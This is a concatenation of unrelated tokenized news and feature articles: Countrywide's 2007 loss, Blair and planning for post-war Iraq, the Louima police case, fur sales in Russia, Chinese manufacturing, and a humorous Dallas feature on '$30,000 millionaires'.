NEW YORK ( Fortune ) -- Countrywide on Tuesday reported a loss of $ 422 million in the fourth quarter and revealed that an astounding one - third of its investment portfolio's sub - prime mortgage loans are delinquent .
The loss threw cold water on Countrywide chief operating officer Steve Sambol 's confident assurances to investors in October that , " We view the third quarter of 2007 as an earnings trough , and anticipate that the company will be profitable in the fourth quarter and in 2008 . "
Seen in this light , Countrywide 's fourth - quarter loss , compared to a $ 621 million profit a year ago , is what the numerous class action attorneys circling Countrywide ( CFC , Fortune 500 ) will surely call " an unfavorable fact . "
Countywide finished 2007 with a loss of $ 704 million .
The numbers did n't appear to faze Bank of America CEO Ken Lewis 's determination to acquire Countrywide , however .
In a conference Tuesday , Bloomberg quoted him as telling investors .
" Everything is a ' go ' to complete this transaction . "
Just over two weeks ago , BoA ( BAC , Fortune 500 ) agreed to buy Calabasas , Calif . - based Countrywide in a $ 4 billion deal .
If and when the deal goes through , the combined company will control just over 25 percent of the U.S. real estate loan origination market .
The market took the highly scripted BoA support as crucial and sent Countrywide stock up 20 cents to $ 6.15 .
At the fulcrum of the mortgage credit crisis , Countrywide 's earnings are seen as a bellwether for the once vibrant - and now largely collapsed - United States mortgage industry .
The primary culprit remains a combination of old - fashioned credit deterioration plus an alarming new development : Borrowers simply are walking away from their homes as their equity value falls ever further below their loan amount .
With respect to credit problems , Countrywide is unmistakably going from bad to worse .
The home lending giant reserved $ 924 million for credit - related losses in the fourth quarter - over a dozen times more than what it set aside in the fourth quarter of last year .
To be fair , the $ 924 million figure is a bit of an improvement from the third quarter 's $ 937 million reserve .
Countrywide 's eye - popping 33 % delinquency rate on its sub - prime mortgage book also represents a decline from the third quarter , where " only " 29.6 % of sub - prime paper was delinquent .
The figures obscure a central fact , however : Countrywide 's portfolio of sub - prime loans consist of those that were not previously written down , or could not be sold or securitized .
In other words , this portfolio is likely to get much , much worse .
Perhaps as worrisome was the credit deterioration on the conventional loan portfolios , where delinquency rates spiked to 5.76 % percent from 4.41 % .
Along similar lines , Countrywide also said it shifted $ 7 billion of " prime non-agency " loans to the portfolio - out of the held - for - sale inventory - because it appears that there were no buyers likely to be found for this paper .
Adding to those woes is the emergence of a disturbing trend for mortgage lenders as some borrowers choose to simply walk away from their homes .
As home values drop to levels far below the mortgage amount , it simply becomes more economically advantageous for certain borrowers to hand over their keys .
In a foreclosure , a mortgage lender often winds up booking losses that approach or even outstrip its loan amount when it sells the property into a distressed market .
" Iraq will be better , " declared Tony Blair five days after the fall of Saddam .
" Better for the region , better for the world , better , above all , for the Iraqi people . "
The Blair - Bush vision was to turn Iraq into a stable nation
Yet it 's now clear that Mr Blair knew before the invasion that America 's planning for post - war recovery was woefully inadequate - and so was Britain's .
There was no properly worked - out strategy for the key longer term objective of transforming it into a stable , prosperous nation that the Blair - Bush vision held out .
' Tearing his hair out '
We know this because Lady [ Sally ] Morgan , Mr Blair 's former political secretary , has said he was " tearing his hair out " , and his former foreign affairs adviser Sir David Manning has said he was " very exercised about it " .
NO PLAN , NO PEACE BBC One 2215 GMT , Sun 28 Oct 2245 GMT , Mon 29 Oct
The fact that Mr Blair feared the invasion aftermath might be heading for disaster is potentially more damaging to his reputation than his decision to put the full weight of his office behind the intelligence that Saddam had weapons of mass destruction .
For that he had cover from the Secret Intelligence Service .
What , then , is his defence to the charge that he recklessly continued with the invasion ?
Mr Rumsfeld took charge of post - war planning war in January 2003
The hawkish defence secretary had required his generals to give America a " lite " footprint - a small invasion force that could be rapidly withdrawn afterwards .
Does this defence stack up ?
It suggests that Mr Blair 's " hair tearing " did not begin until 20 January 2003 - just eight weeks before the invasion .
It was only then that Mr Rumsfeld was put in charge of post - war planning , with a presidential directive establishing a reconstruction unit in the Department of Defense .
Dangerously late
Considering that the American General George C Marshall was given three - and - a - half years to plan the reconstruction of Germany after World War II , that 's leaving things dangerously late .
So why was n't Mr Blair " tearing his hair out " long before 20 January 2003 ?
I simply was n't aware of any planning in relation to the civilian aspects of Basra , my first challenge was to find a computer
Sir Hilary Synnott , Coalition Provisional Authority
Until then , says Sir David , the president had assured them both that the State Department under the moderate Colin Powell would do this .
There had been " plans made and deployed by the State Department " .
" It 's hard to know what happened . "
Yet the State Department 's work was " never intended as a post - war plan " , says Ryan Crocker , American ambassador to Iraq .
It was instead a series of expert study groups whose purpose was to engage Iraqi Americans in thinking about their country 's future .
Far from believing the State Department would be in charge of reconstruction , the challenge to the British government throughout 2002 was to find out who would get the job .
' Black hole ' in planning
A year before the invasion - on the eve of the first Blair - Bush Iraq summit in April 2002 - Sir Christopher Meyer , then British ambassador in Washington , says he urged Mr Blair to " above all start getting them to focus on what next if and when we drive Saddam from office " .
Sir Christopher Meyer warned Blair that planning was ' a blind spot '
Then a few weeks later Sir Christopher says he " upped the volume " to a warning that " there was a black hole in American planning for the aftermath " .
If Mr Blair was tearing his hair out , it does not seem to have happened when it mattered - throughout 2002 - when there was still time to put together a practical plan .
I 'm told that three months before the invasion , the Chief of the Defence Staff Admiral Boyce warned the Pentagon they would be " lucky to get six hours worth of flowers and roses " because liberation would soon turn to occupation .
There were no plans to fill the inevitable vacuum after regime change with a large scale development programme delivering quick wins to show Iraqis that things would be better .
So criminals and insurgents quickly poured into it and have been there ever since .
The charge Mr Blair may have to address in any future inquiry is that he never investigated the risks diligently .
Abandoned principle
There is little evidence that Whitehall performed any better than the Americans in putting together their own reconstruction plans for southern Iraq , for which they had responsibility .
As in Washington , a planning unit was not set up in London until eight weeks before the invasion .
Specialists like engineers to help with water , power and other basic services were very late in being lined up .
Sir Hilary Synnott , who later took charge of the Coalition Provisional Authority office in Basra , says : " I simply was n't aware of any planning in relation to the civilian aspects of Basra .
" My first challenge was to find a computer . "
And that was July - three months after the invasion .
In the rush to war , and in the blur of ideology , both capitals abandoned a principle that has been an iron law of warfare since Napoleon :
Never take the first step without planning for what comes afterwards .
In a second article on Monday , John Ware reveals the extent of the mismanagement of the occupation of Iraq since the war .
" No Plan , No Peace " is on BBC One :
Part One : 2215GMT , Sun 28th Oct
Part Two : 2245GMT , Mon 29th Oct
Abner Louima has retracted a claim that police officers shouted '' It 's Giuliani time ! '' as they allegedly tortured him in the bathroom of a Brooklyn precinct house last summer , one of his lawyers confirmed yesterday .
But Federal and state prosecutors said the revelation had little or no bearing on the case being built against the police in the 70th Precinct on charges that they shoved the handle of a toilet plunger up Mr. Louima 's rectum during an assault in the bathroom .
'' The investigation is continuing and has never been interrupted , '' said William J. Muller , executive assistant United States attorney , denying a report in the Jan. 20 issue of The Village Voice that a Federal grand jury investigation into the case had been suspended .
The implication that Mayor Rudolph W. Giuliani had established a climate in which rogue cops felt emboldened to assault civilians became an issue in the mayoral race last year .
Mr. Giuliani's Democratic challenger , Ruth W. Messinger , repeatedly referred to '' Giuliani time '' in her unsuccessful campaign .
The phrase was also invoked in emotional protest marches against police brutality , including a huge outpouring at City Hall , in which demonstrators denounced the Mayor and brandished toilet plungers .
MOSCOW ( Reuters Life ! ) -
Under the leaden , snow - filled sky of the notorious Moscow winter , commuters rush to work , their heels teetering on ice , and almost every woman -- and a few men -- wear fur .
A worker carries carcasses of silver foxes at a fur farm in the village Batchi , south - west of Minsk November 30 , 2007 .
REUTERS / Vladimir Nikolsky
In a country which suffers long winters where temperatures regularly drop to minus 30 Celsius , fur is viewed as a necessity , and the animal rights activists of the West are nowhere in sight .
Perhaps , because they might freeze to death .
“ I think it would be fun to put ( anti- fur campaigner ) Pamela Anderson for a few weeks here in Russia , in Siberia , and see how she is going to try survive .
It ’s impossible , ” said Natalya Turovnikova , Russian regional manager of Kopenhagen Fur , the world ’s largest furrier .
“ Our business has not been negatively affected at all by animal rights activists , ” she added .
The lucrative fur business , which the International Fur Trade Federation ( IFTF ) puts at about $ 12 billion annual turnover , sees Russia -- a land free from campaigners -- as a promising market .
“ Russia makes up more than half of my fur sales .
The potential here is huge , ” Welsh designer Julien Macdonald , whose extensive use of fur has brought him plenty of criticism in Britain , told Reuters .
“ The hassle , the death threats , everything that goes with it I ’ve had , but it ’s never changed my mind and I do it because I need to ...
It makes more money than any other part of my business , ” Macdonald said on the sidelines of the International Herald Tribune ’s Luxury conference this week in Moscow .
Luxury executives , designers and Saudi royalty gathered at the city ’s most expensive hotel for the conference , which dedicated half a day to fur and held a fur fashion show .
“ The outlook for the Russian fur market is optimal , ” said a russet mink - clad Carla Fendi , one of five Fendi sisters whose parents set up the fashion house in 1925 .
Slideshow ( 5 images )
“ We make fur because people like it , the sensation it creates on your skin .
As for being controversial , what about the people who use silk ?
Those animals also die , ” Fendi , whose business sells a third of its fur in Russia , said .
FUR FASHION SHOW
Later , Russian designers showed off fur creations to a champagne - sipping crowd at the Historical Museum on Red Square .
Under high ceilings elaborately decorated with paintings of Russian saints , slinky models posed in cardigans , skirts , jackets , dresses and shoes made entirely from fur .
Embroidered sable , dyed - purple fox and fur from wild cats with gold glitter also featured .
“ Look , if we lived in a country that refused to eat meat , I would be against using fur , ” fur wizard and one of the evening ’s designers , Igor Chapurin , said .
“ If we say a person ’s life is sacred , that means every single person .
It should be the same for animals , not just for those we do n’t eat .
I ’ve thought a lot about it , ” said Chapurin , whose models wore sheared white mink dresses with balloon sleeves .
Kopenhagen Fur , which sells Chapurin all his fur , produce 40 percent of the world ’s minks , bred on farms in Denmark .
Most fox comes from Finland and Norway .
“ The first time I visited a fur farm , I thought minks in Denmark live much better than Russian people .
We have 100 percent interest in animals ’ lives , ” Turovnikova said .
The IFTF says Russia and the United States are the largest buyers of fur , while western Europe takes a more cautious approach .
But not everyone in Russia approves of the lust for pelts .
“ Consuming is a huge responsibility .
Just think about it , when you buy a bag , I do n’t want to sound depressing but you kill an animal , ” Russia ’s richest and most well - known model , Natalya Vodianova , said .
“ I would just like to encourage people , Russian people , to be a conscious consumer like the rest of Europe . ”
Merry Christmas From China Posted by Pile ( 9479 views ) [ E - Mail link ]
Pick up almost any commonly used product and you wo n’t be surprised to find that it was made in China .
It is here that 90 percent of your Christmas decorations are made , 29 percent of color television sets , 75 percent of the world ’s toys , 70 percent of all cigarette lighters and probably every T - shirt in your closet .
The hard drive for your iPod mini was made in the city of Guiyang .
Located in China ’s poorest province , Guiyang is more noted for its poverty than for making state - of - the - art one - inch hard drives .
Working the assembly lines , China ’s youthful peasant population is quickly abandoning traditional extended - family village life , leaving the monotony of agricultural work and subsistence income behind for a chance at independence .
In the southern province of Guangdong , one can drive for hours along numerous highways that reveal a virtually unbroken landscape of factories and workers ’ dormitories .
These new ‘ manufacturing landscapes ’ in the southern and eastern parts of China produce more and more of the world ’s goods and have become the habitat for a diverse group of companies and millions of busy workers .
Inexpensive labor from the countryside , important as it is to China ’s growth as a tradingnation , is one major facet of its success .
Just as important is a rising industrial production capability .
China now plays a central role in the global supply chain for the world ’s multinational corporations .
Wal - Mart alone outsourced $ 15 billion US in manufacturing , making the company ( if it were a country ) China ’s eighth largest trading partner .
Altogether , nearly half of China ’s foreign trade is tied to foreigninvested enterprises in China .
This investment stimulated managerial , organizational and technical expertise that China has fully integrated into its business model .
Since the early 1990s , more than one - half trillion U.S. dollars have flowed into this country ’s manufacturing sector , mainly from its Asian neighbors ; Hong Kong , Taiwan , Korea , Japan and Singapore and then additionally from North America and Europe .
China has moved up the manufacturing ladder and today exports an increasingly sophisticated array of products .
Its manufacturing future rests not just in being able to absorb technology but also in becoming an innovator and a source for new technology .
Details
Name : ( change name for anonymous posting ) Title : Comments : 1 Article displayed .
After weeks of painstaking research and late - night expeditions that had turned up next to nothing , I was finally on the verge of a breakthrough .
I found myself standing , nearly motionless , in the dark , warm environment that I 'd identified as the native habitat of the creature I 'd been trying so hard to track down :
Homo sapiens douchebagus , a hard - partying bipedal primate indigenous to Dallas .
Many people know this creature better by its common name : the $ 30,000 millionaire .
The name is derived from their distinctive behavioral pattern of spending more money than they make in an attempt to appear wealthy and desirable .
A clever creature , adept at camouflage , Homo sapiens douchebagus is a peculiar species , and evidence of its existence is largely anecdotal .
I hoped to capture one in the wild .
Earlier that night , as I approached my target location downtown , I took note of the telltale signs that experts agree indicate a high likelihood of nearby douchebagus populations .
First , there was the valet stand advertising an $ 8 fee .
Like the symbiotic relationship between a clown fish and the sea anemone that houses it , a $ 30,000 millionaire is never far from a valet .
I handed over my keys to a black - shirted attendant and immediately spotted the next signal : a velvet rope .
Because a good pair of $ 200 leather loafers rarely leaves tracks on the sidewalks of Dallas , a velvet rope is usually the surest indication of a $ 30,000 millionaire 's location .
I 'd arrived early on purpose .
Tonight 's expedition was more of a stakeout than a hunt , so the long line of club - going hopefuls that every $ 30,000 millionaire hopes to bypass with a quick " What 's up , bro ? " to the bouncer had not yet formed .
The black - clad doorman unclipped the velvet rope before me , and I descended into a world of neon blue .
This was Mantus , and today was Naked Sunday .
In 3.5 - inch suede Cole Haan heels , wearing a tiny pair of what a salesgirl had assured me were " winter shorts " and with a head full of painstakingly straightened hair , I had done my best to imitate the target mate of the $ 30,000 millionaire : trendy , scantily clad , but otherwise unremarkable .
No flash , no glow .
I would leave that to my quarry .
In the bar , credit cards passed from patron to bartender .
Discarded glasses containing half - bitten olives and over - squeezed limes littered the scene .
As I forked over $ 7 for a well whiskey and cola , waves of imminent douchebaggery washed over me .
Tonight was my night .
I moved toward the back of the room , near the VIP lounge and high - definition televisions .
The bar , an increasingly popular type of Dallas drinking establishment known as an " ultra lounge , " filled as the minutes ticked closer to midnight .
I sipped my whiskey and sucked in my stomach , smiling slightly .
To my surprise , many potential specimens were looking my way .
My heart pounded .
How close I was to making actual human - to - douchebag contact !
Yes , it seemed every guy who came within 10 feet of me took a good , long look .
It was like they could n't help but stare at this fine piece of girl - bait .
I sucked up my drink , fast , and tried to look thirsty and vacant .
My oglers fit the profile magnificently .
A guy in a white shirt sewn from neckline to hem with superfluous off - white patches glanced over three times .
His buddy , in a dark green sport coat and Kenneth Cole sneakers , followed suit .
Across the walkway , a dude with a bleached faux - hawk and four silver necklaces gave me the eye .
I was on the verge of deciding which one of these guys would be the first to buy me a drink when a flash of pink just a few inches to my left caught my eye .
I turned my head and realized , to my horror , that the flash of pink was exactly that .
Less than a foot from my head , on the high - definition television , was a giant , gyrating female organ , freshly waxed : the real object of all those glances I 'd thought I 'd been getting .
Naked Sundays at Mantus are taken literally — soft - core porn played on the screen all night .
I abandoned my post immediately and was forced to come up with an emergency plan .
Thirsty and vacant could not compete with this broadcast of flesh .
The porn on the wall served as a powerful reminder :
The $ 30,000 millionaire is accustomed to instant gratification .
He can not be expected to work or wait for anything .
I would not only have to insinuate myself into his environment , but I would have to offer myself up to him on a ( leased ) silver platter .
But I remained resolute :
In the name of overpriced martinis everywhere , Homo sapiens douchebagus would be mine .
Elusive and , some say , mythical , the $ 30,000 millionaire is a creature of legend among the denizens of Dallas nightlife .
Used frequently as a term of derision , the $ 30,000 millionaire is often referenced but rarely captured because it is a master of camouflage : $ 30,000 millionaires live above their means , usually with the aid of multiple credit cards and sympathetic family units , spending more money than they make on items such as leased luxury cars , designer clothing and $ 14 drinks .
Fancying myself an intrepid , if boozy , anthropologist , I tried to find out as much as I could about these beings .
My hope : to make this urban legend a reality by observing Homo sapiens douchebagus in its native environment .
Dallas , with its low cost of living , plentiful jobs and affinity for the flashier , finer things in life , is the $ 30,000 millionaire 's ideal habitat .
Exclusive clubs­ — ultra lounges — offering bottle service and supposedly airtight guest lists make it that much easier for the $ 30,000 millionaire to convince himself he is living large .
Live capture may be rare , but sightings are not uncommon , especially in the areas of North Texas where douchebagus is believed to make its nest , forage for food and search for mates .
The anthropologist looking for $ 30,000 millionaires should begin in Uptown , Knox - Henderson or Addison .
Anecdotal evidence , gathered over 2.5 years of shopping , drinking and partying in Dallas , provided me with a basic sketch of the $ 30,000 millionaire .
The creature is predominantly nocturnal .
He is occasionally spotted during daylight hours in close proximity to brunch buffets and build - your - own - Bloody - Mary bars .
More intelligent than many experts give him credit for , the $ 30,000 millionaire is highly social and characterized by easily identifiable plumage : wildly spiked , occasionally faux - hawked and usually frosted hair atop the head .
About the torso , look for brand - name adornment in the form of shirts stamped with cheeky slogans or printed with a great deal of over - designed crap .
There will be man-jewelry .
Indeed , members of the species douchebagus are overwhelmingly male .
This is not a problem , as they have no need to procreate and , in fact , are averse to it .
The rare female of the species is closely related to Homo sapiens gold - diggus and can be recognized by her exorbitantly priced footwear and surgical enhancement in the chest and facial regions .
But barroom conjecture and blurry , late - night observations do not a proper study make .
I needed an expert , someone who could help me find hard evidence .
Luckily enough , the world 's foremost authority on all things Homo sapiens douchebagus lives in Dallas .
His name is Jay Gormley , and most will recognize him as one of the faces of KTVT - Channel 11 's nighttime newscast .
Gormley is the writer of an independent film called , appropriately enough , $ 30,000 Millionaires .
No one has spent more time trying to understand Homo sapiens douchebagus .
When I meet Gormley at his pleasant cottage in Southern Dallas , he is hardly the martini-hating , fashion - loathing lunatic with poor hygiene I expected to encounter .
When a student travels to the outer reaches of the world — in this case , Oak Cliff — to find her mentor , she hopes to be rewarded with an aged , wizened teacher conducting bizarre rituals with smelly , holistic beverages .
To the contrary , the tall , gangly Gormley is an agreeable 41 - year - old single guy , and he makes a fine cup of coffee .
Gormley says he identified the $ 30,000 millionaire immediately upon moving to the city in 1997 as a cub reporter .
After living on a shoestring budget in cities such as Los Angeles and Philadelphia , the 32 - year - old Gormley was pleased with his reporter 's salary in Dallas and ready to start looking into grown - up things like 401 ( k ) s and home ownership .
He still went out a couple of nights a week , though , and was shocked by what he found at local bars and clubs .
" I 'm noticing people five , six , seven years younger than me , " Gormley remembers one morning at his home just south of Kessler Park .
But these drinkers were n't at dollar beer night , or five - dollar pitcher night , the way Gormley remembers his 20s .
" They were partying at $ 12 martini night . "
Gormley initially thought Dallas was just filled with wealthy young people , but closer inspection brought a revelation .
" They were sales managers at J. Crew ! "
The memories are fresh in Gormley 's mind as he throws up his hands , acting out his frustrations : " You dress nicer than me !
You drive nicer cars than me !
But I think I get a little bit more money from my job ! "
Gormley is honest about the source of his frustration : " It was out of jealousy . "
Gormley channeled that negative energy into writing a screenplay .
$ 30,000 Millionaires is a romantic comedy in the vein of Wedding Crashers and Swingers , about the over - sexed , under - funded escapades of five 20 - something Dallasites who live by a mantra Gormley coined : " You fake what you do n't make . "
The film has yet to be made , but Gormley has secured a distribution deal and had an offers sheet — a preliminary contract for a role — approved by Jon Gries , who played Uncle Rico in Napoleon Dynamite .
Today , the movie has become both Gormley 's greatest dream and worst nightmare .
Initial interest in the film was strong , and it looked like Gormley and his filmmaking partner , John Venable , would be overnight successes in the manner of Matt Damon and Ben Affleck .
The Dallas duo launched the film 's Web site , 30 kMillionaires.com , on February 1 , 2006 .
By the end of the month , their site had garnered nearly 40,000 hits and e-mails were pouring in from around the country and across the globe .
Alongside woeful confessional letters from self - professed $ 30,000 millionaires , Gormley found e-mails of interest or Web hits from Warner Bros. and Fox 's comedy development department .
Investors were wrangled .
Money was promised .
And then , nothing .
Bigger projects came up , and $ 30,000 Millionaires was pushed to the backburner .
Today , the film is in limbo .
But passion for the $ 30,000 millionaire remains strong , evidenced by the continuing popularity of Gormley and Venable 's Web site and the e-mails they still receive .
If anyone can take credit for popularizing , if not originating , the term " $ 30,000 millionaire , " it 's these two .
" After I wrote that script and launched that Web site two years ago , it took off , " Gormley says .
His knowledge and understanding of these financially challenged creatures is unparalleled .
He owns what is probably the world 's largest archive of writings collected directly from Homo sapiens douchebagus , amassed in an e-mail folder on his personal computer .
Their words are heartbreaking : " Credit is my middle name , " one laments , and " the only girls I can't get are the good ones that see through my façade . "
Another describes " meeting friends for drinks and watching half of them bail for the bathroom or taking a call when the check comes to the table . "
With my notebook poised , I become his dutiful student , drinking in years of close study and accumulated knowledge .
" Dallas is the Los Angeles of the South , " Gormley lectures , the kind of place where " we drive everywhere to get anywhere . "
Unlike Los Angeles , however , " there are only two things to do : dine out and shop . "
With little local history other than the dubious honor of being the site of the Kennedy assassination , Dallas does n't have the cultural draw of cities such as Chicago or New York or the geographical features that make Miami and Denver destinations .
" There 's not a family somewhere sitting around a table , holding hands , saying , ' Honey , it 's Dallas or San Francisco for vacation this year , where do you want to go ? ' "
Gormley says .
( Naysayers who cite Dallas ' art museum and gallery culture in order to contradict Gormley are addressed in $ 30,000 Millionaires directly :
In the deserted arts district , a character says , " you could shoot someone in broad daylight and never spend a day in jail . " )
The result is a city full of wannabes .
There are enough real moneyed folk —
North ranks sixth in the nation in number of millionaires — tooling around in Bentleys and Rolls - Royces to drive the image - obsessed to financial extremes to fit in .
The recent openings of luxury hotels such as the W and the Ritz - Carlton only further Dallasites ' reputation as connoisseurs of pre-fabricated symbols of wealth .
Our culture is no culture , or , our culture is shiny objects .
The No. 1 thing to look out for , Gormley tells me , is the car .
" A BMW 3 series . "
The cheapest luxury lease you could get .
" It 's always a 3 series . "
As I prepare to enter the field , however , Gormley gives me a dark bit of advice : " The guys who are $ 30,000 millionaires , " he warns , " do n't know that they 're $ 30,000 millionaires . "
I am intrigued and undeterred .
Bigfoot may not know he is Bigfoot , but that does n't mean he wo n't leave tracks in the woods .
Time : 1:15 a.m. Friday
Location : The W Hotel 's Living Room Bar
Research team members : Jay Gormley , John Venable , self
Target : Gormley spots four potential Homo sapiens douchebagus drinking vodka tonics in button - down shirts and whisker - washed jeans
Suspicious behavior : Unnecessary amounts of hair gel .
I approach confidently , unknowingly exuding threatening levels of sass .
I peek my head into their circle and muster up all the sugary - sweetness I have .
" Hey , guys , can I ask you a question ? "
The alpha male , sunglasses perched on his forehead , sizes me up .
" What 's up , babe ? "
" Have you guys ever heard the term ' $ 30,000 millionaire ' ? "
I watch as the guys catch each others ' eyes .
" Yeah , man , they 're all over this place ! " the one in the striped shirt says .
" This place is packed with them , " another assures me , leaning in and assaulting my olfactory nerves with cologne .
" Do you guys know any ? " I ask , looking from the loafers to button - down to hair gel on each one .
" No ! "
" Nah . "
" Uh-uh . "
The alpha male simply shakes his head .
Results : Inconclusive .
Subjects familiar with species .
Possible specimens based on attire , over - application of artificial scent and use of term " babe " for an unfamiliar female .
Reluctance to continue conversation could be construed as an admission of guilt or merely as plain dislike for this researcher .
Does Homo sapiens douchebagus fear sass ?
When Dian Fossey first set up camp in the African wilderness , hoping the surrounding mountain gorillas would eventually become habituated to her presence , she made one key mistake .
The first behavior she set out to imitate in an attempt to integrate into the gorilla culture was chest beating .
Fossey worked hard to imitate the animals ' rhythmic signals by pounding on her own thighs .
Eventually , she got it down , but the gorillas did n't warm to her .
Finally , the answer came : Chest beating is a sign of alarm , not friendship .
I made a similar mistake , and my faux pas also involved a chest — my own .
I wanted something that would introduce the subject of $ 30,000 millionaires subtly .
My first overzealous tracking expedition , to the Ghostbar atop the W and the Living Room Bar on the hotel 's main floor , had revealed little other than the fact that the Ghostbar 's guest list is still a joke .
Unless , that is , your idea of a swanky , exclusive club involves middle - aged women in mom jeans juggling cosmopolitans and Brighton purses , plus a whole lot of dudes in pleated Dockers .
Just as valets and velvet ropes attract Homo sapiens douchebagus , there are certain things guaranteed to repel them .
Pleated Dockers and middle - aged women are on this list .
What would catch the $ 30,000 millionaire 's attention ?
What would make him laugh ?
What would get the conversation started ?
Why , a sexy tank top with " I $ 30 k Millionaires " splashed across the front , of course .
I would turn myself into live bait .
I visited Armhole , the perennially trendy T - shirt boutique in the Mondrian building on Blackburn Street , right in the center of the $ 30,000 millionaire breeding grounds .
In less than an hour , I had both an enlightening conversation with the shop owner and a tight , cheeky tank top .
" We get those types in here sometimes , " the tattooed owner told me , as she affixed little yellow letters to my shirt .
" They pull up in a Mercedes , walk in and ask for a job application . "
She laughed .
" You drive a Mercedes , but you want a job application ? "
It is a fine example of the sad state of $ 30,000 millionaires ' financial affairs .
Bottle service at any local ultra lounge starts in the hundreds of dollars for one night of partying .
Add that to a car payment — figure at least $ 300 to lease a low - end BMW — and $ 650 in rent on the smallest available Uptown or Knox - Henderson studio apartment .
Pile on designer clothes , and the expenses go up .
You might be able to get away with one or two pairs of $ 150 jeans , but even shirts from Banana Republic or Diesel , if the $ 30 k - er is slumming it , will run $ 50 each .
And he 'll need several .
That 's thousands of dollars a month in clothes , booze and flash .
The catch : Anyone who can be seen partying five , six or seven nights a week , as Homo sapiens douchebagus is known to do , ca n't possibly maintain the kind of 9 - to - 5 job necessary to cover those expenses .
How do they do it ?
" We 're not talking three or four credit cards , " debt counselor Bettye Banks tells me , when I go to her to find out how these exorbitant lifestyles are funded .
" We 're talking five or six credit cards . "
Banks is the senior vice president for education at Consumer Credit Counseling Service of Greater Dallas , and if anyone can confirm the existence of debt - plagued Homo sapiens douchebagus , it 's her .
" They are the reason I have a job , " Banks says , a sad smile on her face .
Dallas - Fort Worth consistently ranks among the lowest nationally when it comes to credit scores .
Experian , a company that tracks credit , estimates DFW 's average score to be 667 as of October .
The national average is 692 .
Texas ' average , 666 , is the lowest in the country .
We are maxed out .
Banks calls credit cards " C - 4 , " as in plastic explosive .
" It 's that bling - bling attitude " that makes credit cards so tempting and dangerous , she says .
" Everything 's got to be shiny .
That 's the millionaire outlook , only on a $ 30,000 - per- year income . "
Being a $ 30,000 millionaire is a high - stress job in itself .
Debt collectors call every day , but the pressure to act like you 're shitting cash does n't go away .
No wonder these guys can't stop bragging about their cars and their clothes — it 's all they have to go on , as I learned when I took my " I $ 30 k Millionaires " shirt out for a spin .
Time : 11:30 p.m. Friday
Location : Wish Ultra Lounge , off Knox - Henderson
Research team members :
Two faithful co-workers , self
Target : Blond guy in a faux - hawk and black sport coat
Wish skews younger than other ultra lounges , toward the college set , but this guy is older than most in the crowd .
" Hello , love , " he whispers in my ear .
I 've been left alone with my tank top by my co-workers in hope that I might seem more approachable .
He 's half - drunk , and his British accent is as faux as his faux - hawk .
" Hi , there , " I say , turning to face him .
This is Jeremy , and he is behind the white half - wall that separates the plebes from the swanksters with bottle service and booths .
" I 've been watching you all night , " he says , and I refrain from asking what he thought of the Lean Cuisine I 'd eaten for dinner .
" You 're really hot . "
" Thanks . "
I do a little shoulder - wiggle , wondering how it 's possible that this guy is n't ( 1 ) staring at my boobs and ( 2 ) commenting on the shirt .
" Do you come here often , love ? "
" No , it 's my first time . "
Silence .
I 'm the one being hit on here , right ?
This should be where he swoops in with yet another brilliant , clever follow - up line like , " Are your feet tired ? "
I force the conversation to plod on .
" What brings you here ? "
" Birthday party for my friend , " he explains .
More silence .
I ask him what he does for a living .
" Mortgage banking . "
Riveted as I am by our conversation so far , I 'm anxious to get to what I need to know :
Is he or is n't he a $ 30,000 millionaire ?
I reveal that I 'm a journalist , writing about nightlife in Dallas .
Is he familiar with the $ 30 k - ers ?
" You 're really cute . "
I thank him for his time and head to the bar .
Results :
Not nearly enough game for a $ 30,000 millionaire .
Homo sapiens douchebagus has a nearly unparalleled ability in the field of bullshit .
By the end of the night , I find myself relaxing on an outside futon with a musician and a doctor —
Wes and Joe , respectively .
Recent Dallas transplants from Memphis and Kansas City who happen to know the club owner , they 're miffed by the douchebaggery that surrounds them .
" There 's nothing like this in Memphis , " Wes says .
Joe , the quiet one , nods in agreement .
Musicians and doctors make terrible $ 30,000 millionaires because of the inherently cool nature of their jobs and , for doctors , the fact that saving lives limits the amount of time they have to chug bottles of Grey Goose with Justin Timberlake remixes playing in the background .
I enlist their help in drawing out a key behavior of Homo sapiens douchebagus : peacocking .
" Peacocking " is a term popularized by the mondo - douchebag 's guide to picking up women , The Game .
It means dressing to get the attention of women , but I like to apply it to the douchebag vs. douchebag verbal competition in which each attempts to one - up their opponent by bragging about the expensive things they own .
For the birds , it 's colorful feathers .
For the $ 30,000 millionaire , it 's usually cars .
" Hey , man , what kind of car do you drive ? "
Wes grabs the elbow of the first guy who walks by .
" Infiniti . " Low - end $ 30 k - er. Perfect .
Next , a shocker from a blond guy who does n't look a day over 19 : " Aston Martin , " he says , grinning and putting his arms around two bulbous - chested blondes in sweater dresses .
I try to look impressed rather than incredulous .
" What do you do for a living ? "
" Oil and gas , " he says , winking .
Something tells me that might mean running the grill at Cuba Libre , not closing billion - dollar natural resource deals in South Texas .
Finally , lightning strikes .
The fifth or sixth guy who comes by is bursting with pride .
" ME ? "
He yells over the music , knocking over a freshly poured Cape Cod at the same time , " I have four cars !
Well , three and a motorcycle . "
He rattles off the ways he rolls : a starter Lexus and BMW , plus a Nissan 350Z and a crotch rocket .
Ca n't get a loan on a $ 100,000 Bentley ?
Get $ 30,000 loans and go for quantity over quality .
How did this guy make his fortune ?
The trademark vagueness with regard to Homo sapiens douchebagus ' employment wins : " I sell computers . "
In the end , the only people really attracted by my tank top bait are waitstaff and bartenders , the people who end up suffering when the $ 30,000 millionaire walks his tab or tips 5 percent .
Wearing the shirt to free sushi happy hour at Steel in Oak Lawn , I get laughs and high - fives from every waiter I pass .
" You 're in the right place , " one whispers .
" Look around ! " another says , gesturing to the whole bar .
Same thing at Cretia 's on McKinney .
" They never tip , " the bartender says .
I was done being honest .
Like Dian Fossey and her gorillas , I was never going to get anywhere by causing alarm , so I squeezed myself into a tube dress and parked myself at the end of a posh bar , alone on a Saturday night .
Time : Early Saturday night
Location : Kenichi in Victory Park
Research team members :
Self , honoring the great tradition of other women who sit alone at bars , such as drunks and prostitutes
Target : A soft - featured guy with a blue button - down shirt tucked neatly into his slacks ; lacks the flash usually evident on Homo sapiens douchebagus , but he 's worth a try
I 'm drawn in when " John " and his friends order six cherry - something - or - other - hoo - hah shots , the kind of wussy , trendy shooters favored by guys reluctant to fork over $ 17 for top - shelf tequila when they just need to get drunk enough to talk to a couple of bimbos .
But they pay cash — not typical $ 30 k behavior .
There is one shot left over .
John puts his arm on my chair and pushes the drink toward me .
" Who are you rooting for ? " I ask , gesturing toward the television over the bar .
Oklahoma 's losing to Texas Tech .
" Tech , babe ! " he says .
" It 's my alma mater . " I sympathize .
As a Longhorn fan , I say , I love to see Oklahoma lose any which way .
